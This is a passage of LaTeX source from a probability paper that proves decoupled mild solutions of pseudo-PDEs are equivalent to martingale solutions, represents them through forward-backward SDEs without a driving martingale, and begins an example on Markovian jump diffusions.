a(u) + f\left(\cdot,\cdot,u,\sqrt{\Gamma(u,u)}\right)=0,
\end{equation}
can be naturally decoupled into
\begin{equation}
\left\{
\begin{array}{rcl}
a(u) &=& - f(\cdot,\cdot,u,v)\\
\Gamma(u,u) &=& v^2.
\end{array}\right.
\end{equation}
Since $\Gamma(u,u)=a(u^2)-2ua(u)$, this system of equation will be rewritten as
\begin{equation}
\left\{
\begin{array}{rcl}
a(u) &=& - f(\cdot,\cdot,u,v)\\
a(u^2) &=& v^2 - 2uf(\cdot,\cdot,u,v).
\end{array}\right.
\end{equation}
On the other hand our Markov process $X$ is time non-homogeneous and $V_t$ can be more general than $t$,
which leads us to the following definition of a decoupled mild solution.
\begin{definition}\label{mildsoluv}
Let $(f,g)$ be a couple verifying $H^{growth}(\zeta,\eta)$.
\\
Let $u,v\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ be two Borel functions with $v\geq 0$.
\begin{enumerate}
\item The couple $(u,v)$ will be called {\bf solution
of the identification problem determined by $(f,g)$}
or simply {\bf solution of }
$IP(f,g)$ if $u$ and $v$ belong to $\mathcal{L}^2_X$ and if for every $(s,x)\in[0,T]\times E$,
\begin{equation}\label{MildEq}
\left\{
\begin{array}{rcl}
u(s,x)&=&P_{s,T}[g](x)+\int_s^TP_{s,r}\left[f\left(r,\cdot,u(r,\cdot),v(r,\cdot)\right)\right](x)dV_r\\
u^2(s,x) &=&P_{s,T}[g^2](x) -\int_s^TP_{s,r}\left[v^2(r,\cdot)-2uf\left(r,\cdot,u(r,\cdot),v(r,\cdot)\right)\right](x)dV_r.
\end{array}\right.
\end{equation}
\item The function $u$ will be called {\bf decoupled mild solution}
of $Pseudo-PDE(f,g)$ if there is a function $v$
such that the couple $(u,v)$ is a solution
of $IP(f,g)$.
\end{enumerate}
\end{definition}
\begin{lemma}\label{LemmaMild}
Let $u,v\in\mathcal{L}^2_X$, and let $f$ be a Borel function satisfying the second item of $H^{growth}(\zeta,\eta)$, then $f\left(\cdot,\cdot,u,v\right)$ belongs to $\mathcal{L}_X^2$ and $uf\left(\cdot,\cdot,u,v\right)$ to $\mathcal{L}^1_X$.
\end{lemma}
\begin{proof}
Thanks to the growth condition on $f$ in $H^{growth}(\zeta,\eta)$, there exists a constant $C>0$ such that for any $(s,x)\in[0,T]\times E$,
\begin{equation}\label{EqUniqueness}
\begin{array}{rcl}
&& \mathbbm{E}^{s,x}\left[\int_t^T f^2(r,X_r,u(r,X_r),v(r,X_r))dV_r\right]\\
&\leq& C\mathbbm{E}^{s,x}\left[\int_t^T(f^2(r,X_r,0,0) +u^2(r,X_r)+v^2(r,X_r))dV_r\right]
< \infty,
\end{array}
\end{equation}
since we have assumed that $u^2,v^2$ belong to $\mathcal{L}^1_X$, and since we have made Hypothesis \ref{HypMom} and $H^{growth}(\zeta,\eta)$. This means that $f^2\left(\cdot,\cdot,u,v\right)$ belongs to $\mathcal{L}^1_X$. Since $2\left|uf\left(\cdot,\cdot,u,v\right)\right|\leq u^2+f^2\left(\cdot,\cdot,u,v\right)$ then $uf\left(\cdot,\cdot,u,v\right)$ also belongs to $\mathcal{L}^1_X$.
\end{proof}
\begin{remark} Consequently,
under the assumptions of Lemma \ref{LemmaMild}
all the terms in \eqref{MildEq} make sense.
\end{remark}
\subsection{Existence and uniqueness of a solution}\label{mart-mild}
\begin{proposition}\label{MartingaleImpliesMild}
Assume that $(f,g)$ verifies $H^{growth}(\zeta,\eta)$ (see Hypothesis \ref{Hpqeq}) and
let $u\in\mathcal{L}^2_X$ be a martingale solution of $Pseudo-PDE(f,g)$.
Then $(u,\sqrt{\mathfrak{G}(u,u)})$ is a
solution of $IP(f,g)$ and in particular, $u$ is a decoupled mild solution of $Pseudo-PDE(f,g)$.
\end{proposition}
\begin{proof}
Let $u\in\mathcal{L}^2_X$ be a martingale solution of $Pseudo-PDE(f,g)$. We emphasize that, taking Definition \ref{domainextended} and Proposition \ref{P321} into account, $\mathfrak{G}(u,u)$ belongs to $\mathcal{L}^1_X$,
or equivalently that $\sqrt{\mathfrak{G}(u,u)}$ belongs to $\mathcal{L}^2_X$. By Lemma \ref{LemmaMild}, it follows that
$f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)\in\mathcal{L}^2_X$ and $uf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)\in\mathcal{L}^1_X$.
\\
We fix some $(s,x)\in[0,T]\times E$ and the corresponding probability $\mathbbm{P}^{s,x}$. We are going to show that
\begin{equation} \label{MildEqAux}
\left\{
\begin{array}{rcl}
u(s,x)&=&P_{s,T}[g](x)+\int_s^TP_{s,r}\left[f\left(r,\cdot,u(r,\cdot),\sqrt{\mathfrak{G}(u,u)}(r,\cdot)\right)\right](x)dV_r\\
u^2(s,x) &=&P_{s,T}[g^2](x) -\int_s^TP_{s,r}\left[\mathfrak{G}(u,u)(r,\cdot)-2uf\left(r,\cdot,u(r,\cdot),\sqrt{\mathfrak{G}(u,u)}(r,\cdot)\right)\right](x)dV_r.
\end{array}\right.
\end{equation}
Combining Definitions \ref{domainextended}, \ref{extended}, \ref{D417}, we know that on $[s,T]$, the process $u(\cdot,X_{\cdot})$ has a cadlag
modification which we denote $U^{s,x}$ which is a special semimartingale with decomposition
\begin{equation}\label{decompoU}
U^{s,x}=u(s,x)-\int_s^{\cdot}f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r +M[u]^{s,x},
\end{equation}
where $M[u]^{s,x}\in\mathcal{H}^2_0$.
Definition \ref{D417} also states that $u(T,\cdot)=g$, implying that
\begin{equation}
u(s,x)=g(X_T)+\int_s^Tf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r -M[u]^{s,x}_T\text{ a.s.}
\end{equation}
Taking the expectation, by Fubini's theorem we get
\begin{equation}
\begin{array}{rcl}
u(s,x) &=&\mathbbm{E}^{s,x}\left[g(X_T) +\int_s^T f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r\right]\\
&=&P_{s,T}[g](x)+\int_s^TP_{s,r}\left[f\left(r,\cdot,u(r,\cdot),\sqrt{\mathfrak{G}(u,u)}(r,\cdot)\right)\right](x)dV_r.
\end{array}
\end{equation}
By integration by parts, we obtain
\begin{equation}
d(U^{s,x})^2_t=-2U^{s,x}_tf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(t,X_t)dV_t+2U^{s,x}_{t^-}dM[u]^{s,x}_t +d[M[u]^{s,x}]_t,
\end{equation}
so integrating from $s$ to $T$, we get
\begin{equation}
\begin{array}{rcl}\label{Eq322}
&&u^2(s,x)\\
&=& g^2(X_T)+2\int_s^TU_r^{s,x}f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r -2\int_s^TU^{s,x}_{r^-}dM[u]^{s,x}_r -[M[u]^{s,x}]_T\\
&=&g^2(X_T)+2\int_s^Tuf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r -2\int_s^TU^{s,x}_{r^-}dM[u]^{s,x}_r -[M[u]^{s,x}]_T,
\end{array}
\end{equation}
where the latter line is a consequence of Lemma \ref{ModifImpliesdV}.
The next step will consist in taking the expectation in equation \eqref{Eq322}, but before, we will check that $\int_s^{\cdot}U^{s,x}_{r^-}dM[u]^{s,x}_r$ is a martingale.
Thanks to \eqref{decompoU} and Jensen's inequality, there exists a constant $C>0$ such that
\begin{equation}
\underset{t\in[s,T]}{\text{sup }}(U^{s,x}_t)^2\leq C\left(\int_s^Tf^2\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r +\underset{t\in[s,T]}{\text{sup }}(M[u]^{s,x}_t)^2\right).
\end{equation}
Since $M[u]^{s,x}\in\mathcal{H}^2_0$ and $f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)\in\mathcal{L}^2_X$,
it follows that $\underset{t\in[s,T]}{\text{sup }}(U^{s,x}_t)^2\in L^1$ and Lemma 3.15 in
\cite{paper1preprint}
states that $\int_s^{\cdot}U^{s,x}_{r^-}dM[u]^{s,x}_r$ is a martingale.
Taking the expectation in \eqref{Eq322}, we now obtain
\begin{equation}
\begin{array}{rcl}
u^2(s,x) &=& \mathbbm{E}^{s,x}\left[g^2(X_T) +\int_s^T 2uf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r-\left[M[u]^{s,x}\right]_T\right]\\
&=& \mathbbm{E}^{s,x}\left[g^2(X_T) +\int_s^T 2uf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r-\langle M[u]^{s,x}\rangle_T\right]\\
&=&\mathbbm{E}^{s,x}\left[g^2(X_T)\right]- \mathbbm{E}^{s,x}\left[\int_s^T \left(\mathfrak{G}(u,u)-2uf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)\right)(r,X_r)dV_r\right]\\
&=& P_{s,T}[g^2](x) -\int_s^TP_{s,r}\left[\mathfrak{G}(u,u)(r,\cdot)-2u(r,\cdot)f\left(r,\cdot,u(r,\cdot),\sqrt{\mathfrak{G}(u,u)}(r,\cdot)\right)\right](x)dV_r,
\end{array}
\end{equation}
where the third equality derives from Proposition \ref{P321} and the fourth from Fubini's theorem.
This concludes the proof.
\end{proof}
We now show the converse result of Proposition \ref{MartingaleImpliesMild}.
\begin{proposition}\label{MildImpliesMartingale}
Assume that $(f,g)$ verifies $H^{growth}(\zeta,\eta)$,
see Hypothesis \ref{Hpqeq}.
Every decoupled mild solution of $Pseudo-PDE(f,g)$ is a also a martingale solution. Moreover, if $(u,v)$ solves $IP(f,g)$, then $v^2=\mathfrak{G}(u,u)$ (up to zero potential sets).
\end{proposition}
\begin{proof}
Let $u$ and $v\geq 0$ be a couple of functions in $\mathcal{L}^2_X$ verifying \eqref{MildEq}. We first note that, the first line of \eqref{MildEq} with $s=T$, gives $u(T,\cdot)=g$.
\\
We fix $(s,x)\in[0,T]\times E$ and the associated probability $\mathbbm{P}^{s,x}$, and on $[s,T]$,
we set $U_t:=u(t,X_t)$ and $N_t:=u(t,X_t)-u(s,x)+\int_s^tf(r,X_r,u(r,X_r),v(r,X_r))dV_r$.
\\
\\
Combining the first line of \eqref{MildEq} applied in $(s,x)=(t,X_t)$ and the Markov property \eqref{Markov3}, and since $f\left(\cdot,\cdot,u,v\right)$ belongs to $\mathcal{L}^2_X$ (see Lemma \ref{LemmaMild}) we get the a.s. equalities
\begin{equation}
\begin{array}{rcl}
U_t &=& u(t,X_t) \\
&=& P_{t,T}[g](X_t) + \int_t^TP_{t,r}\left[f\left(r,\cdot,u(r,\cdot),v(r,\cdot)\right)\right](X_t)dV_r\\
&=& \mathbbm{E}^{t,X_t}\left[g(X_T)+\int_t^T f(r,X_r,u(r,X_r),v(r,X_r))dV_r\right] \\
&=& \mathbbm{E}^{s,x}\left[g(X_T)+\int_t^T f(r,X_r,u(r,X_r),v(r,X_r))dV_r|\mathcal{F}_t\right],
\end{array}
\end{equation}
from which we deduce that
$N_t=\mathbbm{E}^{s,x}\left[g(X_T)+\int_s^T f(r,X_r,u(r,X_r),v(r,X_r))dV_r|\mathcal{F}_t\right]-u(s,x)$ a.s.
So $N$ is a martingale. We can therefore consider on $[s,T]$ and under $\mathbbm{P}^{s,x}$, $N^{s,x}$ the cadlag version of $N$, and the special semi-martingale
\\
$U^{s,x} := u(s,x)- \int_s^{\cdot} f(r,X_r,u(r,X_r),v(r,X_r))dV_r + N^{s,x}$ which is a cadlag version of $U$.
By Jensen's inequality for both expectation and
conditional expectation, we have
\begin{equation}
\begin{array}{rcl}
\mathbbm{E}^{s,x}[(N^{s,x})^2_t]&=&\mathbbm{E}^{s,x}\left[\left(\mathbbm{E}^{s,x}\left[g(X_T)+\int_s^T f(r,X_r,u(r,X_r),v(r,X_r))dV_r|\mathcal{F}_t\right]-u(s,x)\right)^2\right]\\
&\leq& 3u^2(s,x) + 3\mathbbm{E}^{s,x}[g^2(X_T)] + 3\mathbbm{E}^{s,x}\left[\int_s^T f^2(r,X_r,u(r,X_r),v(r,X_r))dV_r\right]\\
&<& \infty,
\end{array}
\end{equation}
where the second term is finite because of $H^{mom}(\zeta,\eta)$ and $H^{growth}(\zeta,\eta)$, and the same also holds for the third one because $f\left(\cdot,\cdot,u,v\right)$ belongs to $\mathcal{L}^2_X$, see Lemma \ref{LemmaMild}. So $N^{s,x}$ is square integrable. We have therefore shown that under any $\mathbbm{P}^{s,x}$, the process $u(\cdot,X_{\cdot})-u(s,x)+\int_s^{\cdot}f(r,X_r,u(r,X_r),v(r,X_r))dV_r$ has on $[s,T]$ a modification in $\mathcal{H}^2_0$. Definitions \ref{domainextended} and \ref{extended}, justify that $u\in\mathcal{D}(\mathfrak{a})$,
$\mathfrak{a}(u)=-f(\cdot,\cdot,u,v)$ and that for any $(s,x)\in[0,T]\times E$, $M[u]^{s,x}=N^{s,x}$.
\\
To conclude that $u$ is a martingale solution of $Pseudo-PDE(f,g)$, there is left to show that $\mathfrak{G}(u,u)=v^2$, up to zero potential sets. By Proposition \ref{P321}, this is equivalent to show that for every $(s,x)\in[0,T]\times E$,
\\
$\langle N^{s,x}\rangle = \int_s^{\cdot}v^2(r,X_r)dV_r$,
in the sense of indistinguishability.
\\
\\
We fix again $(s,x)\in[0,T]\times E$ and the associated probability, and now set
\\
$N'_t:=u^2(t,X_t)-u^2(s,x)-\int_s^t(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r$. Combining the second line of \eqref{MildEq} applied in $(s,x)=(t,X_t)$ and the Markov property \eqref{Markov3}, and since $v^2,uf\left(\cdot,\cdot,u,v\right)$ belong to $\mathcal{L}^1_X$ (see Lemma \ref{LemmaMild}) we get the a.s. equalities
\begin{equation}
\begin{array}{rcl}
u^2(t,X_t) &=& P_{t,T}[g^2](X_t) - \int_t^TP_{t,r}\left[(v^2(r,\cdot)-2u(r,\cdot)f\left(r,\cdot,u(r,\cdot),v(r,\cdot)\right))\right](X_t)dV_r\\
&=& \mathbbm{E}^{t,X_t}\left[g^2(X_T)-\int_t^T(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r\right] \\
&=& \mathbbm{E}^{s,x}\left[g^2(X_T)-\int_t^T(v^2- 2uf(\cdot,\cdot,u,v))(r,X_r)dV_r|\mathcal{F}_t\right],
\end{array}
\end{equation}
from which we deduce that for any $t\in[s,T]$,
\\
$N'_t=\mathbbm{E}^{s,x}\left[g^2(X_T)-\int_s^T (v^2- uf(\cdot,\cdot,u,v))(r,X_r)dV_r|\mathcal{F}_t\right]-u^2(s,x)$ a.s.
So $N'$ is a martingale. We can therefore consider on $[s,T]$ and under $\mathbbm{P}^{s,x}$, $N'^{s,x}$ the cadlag version of $N'$.
\\
The process $u^2(s,x)+ \int_s^{\cdot}(v^2-uf(\cdot,\cdot,u,v))(r,X_r)dV_r + N'^{s,x}$ is therefore a cadlag special semi-martingale which is a $\mathbbm{P}^{s,x}$-version of $u^2(\cdot,X)$ on $[s,T]$. But we also had shown that
$U^{s,x}=u(s,x)- \int_s^{\cdot} f(r,X_r,u(r,X_r),v(r,X_r))dV_r + N^{s,x}$ is a version of $u(\cdot,X),$ which by integration by part implies that
\\
$u^2(s,x)-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r+2\int_s^{\cdot}U^{s,x}_{r^-}dN^{s,x}_r+[N^{s,x}]$ is another cadlag semi-martingale which is a $\mathbbm{P}^{s,x}$-version of $u^2(\cdot,X)$ on $[s,T]$.
\\
$\int_s^{\cdot}(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r + N'^{s,x}$ is therefore indistinguishable from
\\
$-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r+2\int_s^{\cdot}U^{s,x}_{r^-}dN^{s,x}_r+[N^{s,x}]$ which can be written $\langle N^{s,x}\rangle-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r +2\int_s^{\cdot}U^{s,x}_{r^-}dN^{s,x}_r+([N^{s,x}]-\langle N^{s,x}\rangle)$ where $\langle N^{s,x}\rangle-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r$ is predictable with bounded variation and $2\int_s^{\cdot}U^{s,x}_{r^-}dN^{s,x}_r+([N^{s,x}]-\langle N^{s,x}\rangle)$ is a local martingale. By uniqueness of the decomposition of a special semi-martingale, we have
\\
$\int_s^{\cdot}(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r=\langle N^{s,x}\rangle-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r$, and by Lemma \ref{ModifImpliesdV},
$\int_s^{\cdot}(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r=\langle N^{s,x}\rangle-2\int_s^{\cdot}uf(\cdot,\cdot,u,v)(r,X_r)dV_r$, which finally yields $\langle N^{s,x}\rangle=\int_s^{\cdot}v^2(r,X_r)dV_r$ as desired.
\end{proof}
We recall that $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ is
a Markov class associated to a transition function measurable
in time (see Definitions \ref{defMarkov} and \ref{DefFoncTrans}) which
fulfills Hypothesis \ref{MPwellposed},
i.e. it is a solution of a well-posed Martingale Problem associated with
the triplet $(\mathcal{D}(a),a,V)$.
Moreover we suppose Hypothesis $H^{mom}(\zeta,\eta)$ for some positive
$\zeta,\eta$, see Hypothesis \ref{HypMom}.
\begin{theorem}\label{MainTheorem}
Let $(f,g)$ be a couple verifying $H^{lip}(\zeta,\eta)$, see Hypothesis
\ref{Hpq}.
Then $Pseudo-PDE(f,g)$ has a unique decoupled mild solution.
\end{theorem}
\begin{proof}
This derives from Theorem \ref{RMartExistenceUniqueness} and Propositions \ref{MartingaleImpliesMild}, \ref{MildImpliesMartingale}.
\end{proof}
\begin{corollary}\label{CoroClassicMild}
Assume that $(f,g)$ verifies $H^{lip}(\zeta,\eta)$, see Hypothesis \ref{Hpq}.
A classical solution $u$ of $Pseudo-PDE(f,g)$ such that
$\Gamma(u,u)\in\mathcal{L}^1_X$, is also a decoupled mild solution.
\\
Conversely, if $u$ is a decoupled mild solution of $Pseudo-PDE(f,g)$
belonging to $\mathcal{D}(a)$, then $u$ is a classical solution of $Pseudo-PDE(f,g)$ up to a zero-potential set, meaning that the first equality of \eqref{PDE} holds up to a set of zero potential.
\end{corollary}
\begin{proof}
The statement holds by Proposition \ref{MildImpliesMartingale} and Proposition \ref{CoroClassic}.
\end{proof}
\subsection{Representation of the solution via FBSDEs with no driving martingale}\label{FBSDEs}
In the companion paper \cite{paper1preprint}, the following family of FBSDEs with no driving martingale indexed by $(s,x)\in[0,T]\times E$ was introduced.
\begin{definition}
Let $(s,x)\in[0,T]\times E$ and the associated stochastic basis $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ be fixed. A couple
\\
$(Y^{s,x},M^{s,x})\in\mathcal{L}^2(dV\otimes d\mathbbm{P}^{s,x})\times\mathcal{H}^2_0$ will be said to solve $FBSDE^{s,x}(f,g)$ if it verifies on $[0,T]$,
in the sense of indistinguishability
\begin{equation}\label{BSDE}
Y^{s,x} = g(X_T) + \int_{\cdot}^T f\left(r,X_r,Y^{s,x}_r,\sqrt{\frac{d\langle M^{s,x}\rangle}{dV}}(r)\right)dV_r -(M^{s,x}_T - M^{s,x}_{\cdot}).
\end{equation}
If \eqref{BSDE} is only satisfied on a smaller interval $[t_0,T]$, with $0<t_0<T$, we say that $(Y^{s,x},M^{s,x})$ solves $FBSDE^{s,x}(f,g)$ on $[t_0,T]$.
\end{definition}
The following result follows from Theorem 3.22 in \cite{paper1preprint}.
\begin{theorem}\label{SolBSDE}
Assume that $(f,g)$ verifies $H^{lip}(\zeta,\eta)$, see Hypothesis \ref{Hpq}.
Then for any
$(s,x)\in[0,T]\times E$, $FBSDE^{s,x}(f,g)$ has a unique solution.
\end{theorem}
In the following theorem, we summarize the links between the $FBSDE^{s,x}(f,g)$ and the notion of martingale solution of $Pseudo-PDE(f,g)$.
These are shown in Theorem 5.14, Remark 5.15, Theorem 5.20 and Theorem 5.21 of \cite{paper1preprint}.
\begin{theorem}\label{Defuv}
Assume that $(f,g)$ verifies $H^{lip}(\zeta,\eta)$ (see Hypothesis \ref{Hpq})
and let $(Y^{s,x}, M^{s,x})$ denote the (unique) solution of $FBSDE^{s,x}(f,g)$ for fixed $(s,x)$.
Let $u$ be the unique martingale solution
of $Pseudo-PDE(f,g)$.
For every
$(s,x)\in[0,T]\times E$, on the interval $[s,T]$,
\begin{itemize}
\item $Y^{s,x}$ and $u(\cdot,X_{\cdot})$ are $\mathbbm{P}^{s,x}$-modifications, and equal $dV\otimes d\mathbbm{P}^{s,x}$ a.e.;
\item $M^{s,x}$ and $M[u]^{s,x}$ are $\mathbbm{P}^{s,x}$-indistinguishable.
\end{itemize}
Moreover $u$ belongs to $\mathcal{L}^2_X$ and
for any $(s,x)\in[0,T]\times E$, we have
$\frac{d\langle M^{s,x}\rangle}{dV}=\mathfrak{G}(u,u)(\cdot,X_{\cdot})$ $dV\otimes d\mathbbm{P}^{s,x}$ a.e.
\end{theorem}
\begin{remark} The martingale solution $u$ of $Pseudo-PDE$ exists
and is unique
by Theorem \ref{RMartExistenceUniqueness}.
\end{remark}
We can therefore represent the unique decoupled mild solution of $Pseudo-PDE(f,g)$ via the stochastic equations $FBSDE^{s,x}(f,g)$ as follows.
\begin{theorem}\label{Representation}
Assume that $(f,g)$ verifies $H^{lip}(\zeta,\eta)$ (see Hyothesis
\ref{Hpq})
and let $(Y^{s,x}, M^{s,x})$ denote the (unique) solution of $FBSDE^{s,x}(f,g)$ for fixed $(s,x)$.
\\
Then for any $(s,x)\in[0,T]\times E$, the random variable $Y^{s,x}_s$ is $\mathbbm{P}^{s,x}$ a.s. equal to a constant (which we still denote $Y^{s,x}_s$), and the function
\begin{equation}
u:(s,x)\longmapsto Y^{s,x}_s
\end{equation}
is the unique decoupled mild solution of $Pseudo-PDE(f,g)$.
\end{theorem}
\begin{proof}
By Theorem \ref{Defuv}, there exists a Borel function $u$ such that for every $(s,x)\in[0,T]\times E$, $Y^{s,x}_s=u(s,X_s)=u(s,x)$ $\mathbbm{P}^{s,x}$ a.s. and $u$ is the unique martingale solution of $Pseudo-PDE(f,g)$. By Proposition \ref{MartingaleImpliesMild}, it is also its unique decoupled mild solution.
\end{proof}
\begin{remark} \label{R317}
The function $v$ such that $(u,v)$ is the unique solution of the identification problem $IP(f,g)$ also has a stochastic representation since it verifies for every $(s,x)\in[0,T]\times E$, on the interval $[s,T]$,
\\
$\frac{d\langle M^{s,x}\rangle}{dV}=v^2(\cdot,X_{\cdot})$ $dV\otimes d\mathbbm{P}^{s,x}$ a.e. where $M^{s,x}$ is the martingale part of the solution of $FBSDE^{s,x}$.
\end{remark}
Conversely, under the weaker condition $H^{growth}(\zeta,\eta)$ if one knows the solution of $IP(f,g)$, one can (for every $(s,x)$) produce a version of
a solution of $FBSDE^{s,x}(f,g)$ as follows. This is only possible with the notion of decoupled mild solution:
even in the case of Brownian BSDEs the knowledge of the viscosity solution
of the related PDE would (in general) not be sufficient to reconstruct the
family of solutions of the BSDEs.
\begin{proposition}\label{MildImpliesBSDE}
Assume that $(f,g)$ verifies $H^{growth}(\zeta,\eta)$, see Hypothesis \ref{Hpqeq}.
Suppose the existence of a solution $(u,v)$ to $IP(f,g)$, and let $(s,x)\in[0,T]\times E$ be fixed.
Then
\begin{equation}
\left(u(\cdot,X),\quad u(\cdot,X)-u(s,x)+\int_s^{\cdot}f(\cdot,\cdot,u,v)(r,X_r)dV_r\right)
\end{equation}
admits on $[s,T]$ a $\mathbbm{P}^{s,x}$-version $(Y^{s,x},M^{s,x})$
which solves $FBSDE^{s,x}$ on $[s,T]$.
\end{proposition}
\begin{proof}
By Proposition \ref{MildImpliesMartingale}, $u$ is a martingale solution of $Pseudo-PDE(f,g)$ and $v^2=\mathfrak{G}(u,u)$. We now fix $(s,x)\in[0,T]\times E$. Combining Definitions \ref{extended}, \ref{extendedgamma} and \ref{D417}, we know that $u(T,\cdot)=g$ and that on $[s,T]$, $u(\cdot,X)$ has a $\mathbbm{P}^{s,x}$-version $U^{s,x}$ with decomposition
$U^{s,x}=u(s,x)-\int_s^{\cdot}f(\cdot,\cdot,u,v)(r,X_r)dV_r +M[u]^{s,x}$, where $M[u]^{s,x}$ is an element of $\mathcal{H}^2_0$ of angular bracket $\int_s^{\cdot}v^2(r,X_r)dV_r$ and is a version of $u(\cdot,X)-u(s,x)+\int_s^{\cdot}f(\cdot,\cdot,u,v)(r,X_r)dV_r$. By Lemma \ref{ModifImpliesdV}, taking into account
$u(T,\cdot)=g$, the couple $(U^{s,x},M[u]^{s,x})$ verifies on $[s,T]$, in the sense of indistinguishability
\begin{equation}
U^{s,x} = g(X_T)+\int_{\cdot}^Tf\left(r,X_r,U^{s,x}_r,\sqrt{\frac{d\langle M[u]^{s,x}\rangle}{dV}}(r)\right)dV_r -(M[u]^{s,x}_T-M[u]^{s,x}_{\cdot})
\end{equation}
with $M[u]^{s,x}\in\mathcal{H}^2_0$ verifying $M[u]^{s,x}_s=0$ (see Definition \ref{extended}) and $U^{s,x}_s$ is deterministic so in particular
is a square integrable r.v.
Following a slight adaptation of
the proof of Lemma 3.25 in \cite{paper1preprint}
(see Remark \ref{RAdaptation} below), this implies that $U^{s,x}\in\mathcal{L}^2(dV\otimes d\mathbbm{P}^{s,x})$ and therefore that
that $(U^{s,x},M[u]^{s,x})$ is a solution of $FBSDE^{s,x}(f,g)$
on $[s,T]$.
\end{proof}
\begin{remark} \label{RAdaptation}
Indeed Lemma 3.25 in \cite{paper1preprint}, taking into account Notation 5.5
ibidem can be formally applied only under $H^{lip}(\zeta,\eta)$ for $(f,g)$.
However, the same proof easily
allows an extension to our framework $H^{growth}(\zeta,\eta)$.
\end{remark}
\section{Examples of applications}\label{exemples}
We now develop some examples. Some of the applications that we are interested in involve operators which only act on the space variable, and we will extend them to time-dependent functions. The reader may consult
Appendix \ref{SC}, concerning details about such extensions.
In all the items below there will be a canonical Markov class with transition function
measurable in time which is solution of a well-posed Martingale Problem associated to some triplet
$(\mathcal{D}(a),a,V)$ as introduced in Definition \ref{MartingaleProblem}. Therefore all the results of
this paper will apply to all the examples below, namely Theorem \ref{RMartExistenceUniqueness}, Propositions \ref{CoroClassic}, \ref{MartingaleImpliesMild} and \ref{MildImpliesMartingale}, Theorem \ref{MainTheorem}, Corollaries \ref{CoroClassicMild} and \ref{CoroClassicMild}, Theorems \ref{SolBSDE}, \ref{Defuv} and \ref{Representation} and Proposition \ref{MildImpliesBSDE}. In particular, Theorem \ref{MainTheorem}
states in all the cases, under suitable Lipschitz type conditions for the driver $f$,
that the corresponding Pseudo-PDE admits a unique decoupled mild solution.
In all the examples $T \in\mathbbm{R}_+^*$ will be fixed.
\subsection{Markovian jump diffusions}\label{S4a}
In this subsection, the state space will be $E:=\mathbbm{R}^d$ for some $d\in\mathbbm{N}^*$.
We are given $\mu\in\mathcal{B}([0,T]\times \mathbbm{R}^d, \mathbbm{R}^d)$, $\alpha\in\mathcal{B}([0,T]\times \mathbbm{R}^d,S^*_+(\mathbbm{R}^d))$
(where $S^*_+(\mathbbm{R}^d)$ is the space of symmetric strictly positive definite matrices of size $d$) and $K$ a L\'evy kernel: this means that for every $(t,x)\in [0,T]\times \mathbbm{R}^d$, $K(t,x,\cdot)$ is a $\sigma$-finite measure
on $\mathbbm{R}^d\backslash\{0\}$, $\underset{t,x}{\text{sup}}\int \frac{\|y\|^2}{1+\|y\|^2}K(t,x,dy)<\infty$ and for every Borel set $A\in\mathcal{B}(\mathbbm{R}^d\backslash\{0\})$,
$(t,x)\longmapsto \int_A \frac{\|y\|^2}{1+\|y\|^2}K(t,x,dy)$ is Borel.
We will consider the operator $a$ defined by
\begin{equation} \label{PIDE}
\partial_t\phi + \frac{1}{2}Tr(\alpha\nabla^2\phi) + (\mu,\nabla \phi) +\int\left(\phi(\cdot,\cdot+y)-\phi(\cdot,y)-\frac{(y,\nabla \phi)}{1+\|y\|^2}\right)K(\cdot,\cdot,dy),
\end{equation}
on the domain $\mathcal{D}(a)$ which is here the linear algebra
$\mathcal{C}^{1,2}_b([0,T]\times\mathbbm{R}^d,\mathbbm{R})$ of real continuous bounded functions on $[0,T]\times \mathbbm{R}^d$ which are continuously differentiable in the first variable with bounded derivative, and twice continuously differentiable in the second variable with bounded derivatives.
\\
\\
Concerning martingale problems associated to parabolic PDE operators, one may consult \cite{stroock}. Since we want to include integral operators, we will adopt the formalism of D.W. Stroock in \cite{stroock1975diffusion}. Its Theorem 4.3 and the penultimate sentence of its proof states the following.
\begin{theorem}\label{Stroock}
Suppose that $\mu$ is bounded, that $\alpha$ is bounded continuous
and that for any $A\in\mathcal{B}(\mathbbm{R}^d\backslash\{0\})$,
$(t,x)\longmapsto \int_A \frac{y}{1+\|y\|^2}K(t,x,dy)$ is bounded continuous.
Then, for every $(s,x)$, there exists a unique probability $\mathbbm{P}^{s,x}$ on the canonical space (see Definition \ref{canonicalspace}) such that $\phi(\cdot,X_{\cdot})-\int_s^{\cdot}a(\phi)(r,X_r)dr$ is a local martingale for any $\phi\in\mathcal{D}(a)$ and $\mathbbm{P}^{s,x}(X_s=x)=1$.
